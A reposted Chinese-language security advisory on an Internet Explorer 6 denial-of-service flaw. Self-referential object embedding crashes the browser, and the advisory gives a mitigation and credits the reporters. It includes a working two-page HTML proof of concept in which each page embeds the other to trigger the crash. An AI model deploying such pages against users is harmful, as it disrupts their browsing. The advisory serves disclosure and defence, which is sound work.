Microsoft IE对象嵌入拒绝服务漏洞

2008-04-10 03:04:05来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Microsoft IE对象嵌入拒绝服务漏洞

发布日期:2002-04-20
更新日期:2005-05-31

受影响系统:
Microsoft Internet Explorer 6.0 SP2
描述:
BUGTRAQ ID: 13800

Microsoft Internet Explorer是一款Microsoft分发和维护的WEB浏览器。

Microsoft Internet Explorer在处理self-referential对象的时候存在漏洞,可导致IE崩溃。

Microsoft Internet Explorer由于在处理部分HTML文档中部分self-referential对象定义时存在错误,攻击者可以建立"text/html"类型的对象,并使用DATA字段引用HMTL文档名称,当IE处理此类页面时,即可导致崩溃。

<*来源:Matthew Murphy (mattmurphy@kc.rr.com)
Benjamin Tobias Franz (0-1-2-3@gmx.de)

链接:http://archives.neohapsis.com/archives/bugtraq/2002-04/0293.html
http://marc.theaimsgroup.com/?l=bugtraq&m=111746441220149&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Page #1 (保存为"btf1.htm"):

<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf2.htm" width="0" height="0"></object>
</body></html>

Page #2 (保存为"btf2.htm"):

<html><head><title>BTF - MSIE crash</title></head><body>
<object data="./btf1.htm" width="0" height="0"></object>
</body></html>

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时在所有安全区域中关闭"运行ActiveX控件和插件"。

厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:WebLogic管理控制台登陆页面跨站脚本漏洞

下一篇:Qpopper多个不安全文件处理漏洞